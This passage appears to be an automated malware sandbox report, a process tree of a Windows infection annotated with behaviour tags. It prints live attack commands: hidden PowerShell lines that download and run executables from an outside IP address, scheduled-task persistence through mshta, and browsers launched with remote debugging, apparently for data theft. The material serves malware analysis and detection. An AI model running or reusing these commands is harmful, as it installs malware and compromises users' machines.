C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:15⤵
- Uses browser remote debugging
PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:15⤵
- Uses browser remote debugging
PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,1395403121855923071,7841064476941695622,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:15⤵
- Uses browser remote debugging
PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\r90rq" & exit4⤵
- System Location Discovery: System Language Discovery
PID:1092 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
C:\Users\Admin\AppData\Local\Temp\1090449101\1592ba5686.exe"C:\Users\Admin\AppData\Local\Temp\1090449101\1592ba5686.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Xe7HKma1XZq /tr "mshta C:\Users\Admin\AppData\Local\Temp\4x9XsMw8I.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:4816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Xe7HKma1XZq /tr "mshta C:\Users\Admin\AppData\Local\Temp\4x9XsMw8I.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4544
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\4x9XsMw8I.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Users\Admin\AppData\Local\Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE"C:\Users\Admin\AppData\Local\Temp2OCIQRLPJDWPBITTKWNG00I9MCTS2FUE.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090450021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090450021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:1268 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "9LxRHmaJIum" /tr "mshta \"C:\Temp\cUlGP2yXD.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4256
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\cUlGP2yXD.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090498001\f93ba905bf.exe"C:\Users\Admin\AppData\Local\Temp\1090498001\f93ba905bf.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\1090499001\0d668332f1.exe"C:\Users\Admin\AppData\Local\Temp\1090499001\0d668332f1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090500001\5e1ba7a6df.exe"C:\Users\Admin\AppData\Local\Temp\1090500001\5e1ba7a6df.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4384
-
-
C:\Users\Admin\AppData\Local\Temp\1090501001\9e8de64c90.exe"C:\Users\Admin\AppData\Local\Temp\1090501001\9e8de64c90.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:232
-
-
C:\Users\Admin\AppData\Local\Temp\1090502001\d796f4a3f4.exe"C:\Users\Admin\AppData\Local\Temp\1090502001\d796f4a3f4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4524
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090503001\4604003cca.exe"C:\Users\Admin\AppData\Local\Temp\1090503001\4604003cca.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\1090504001\7f488eac68.exe"C:\Users\Admin\AppData\Local\Temp\1090504001\7f488eac68.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2616 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090505001\19ec845a59.exe"C:\Users\Admin\AppData\Local\Temp\1090505001\19ec845a59.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 15444⤵
- Program crash
PID:3760
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090506001\5371839e91.exe"C:\Users\Admin\AppData\Local\Temp\1090506001\5371839e91.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3672
-
-
C:\Users\Admin\AppData\Local\Temp\1090509001\da74b104e1.exe"C:\Users\Admin\AppData\Local\Temp\1090509001\da74b104e1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:440
-
-
C:\Users\Admin\AppData\Local\Temp\1090510001\14349890e7.exe"C:\Users\Admin\AppData\Local\Temp\1090510001\14349890e7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2572 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1912 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97948cc40,0x7ff97948cc4c,0x7ff97948cc585⤵PID:3244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2140,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2136 /prefetch:25⤵PID:4092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1860,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2172 /prefetch:35⤵PID:1448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2312,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2492 /prefetch:85⤵PID:1000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:15⤵
- Uses browser remote debugging
PID:976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:15⤵
- Uses browser remote debugging
PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4492 /prefetch:85⤵PID:3044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:15⤵
- Uses browser remote debugging
PID:1440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3164,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:85⤵PID:532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4784,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3632 /prefetch:15⤵
- Uses browser remote debugging
PID:3644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:85⤵PID:4568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5264,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5256 /prefetch:85⤵PID:4376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4260,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:85⤵PID:452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5148,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5208 /prefetch:85⤵PID:1924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5204,i,8431106854926578539,18293543738730640675,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4800 /prefetch:85⤵PID:1868
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5160 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff976a746f8,0x7ff976a74708,0x7ff976a747185⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:25⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:35⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:85⤵PID:5356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:15⤵
- Uses browser remote debugging
PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:15⤵
- Uses browser remote debugging
PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:25⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4744 /prefetch:25⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2536 /prefetch:25⤵PID:6364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4860 /prefetch:25⤵PID:6560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1534154142835843784,1057478993313101969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2196 /prefetch:25⤵PID:6832
-
-
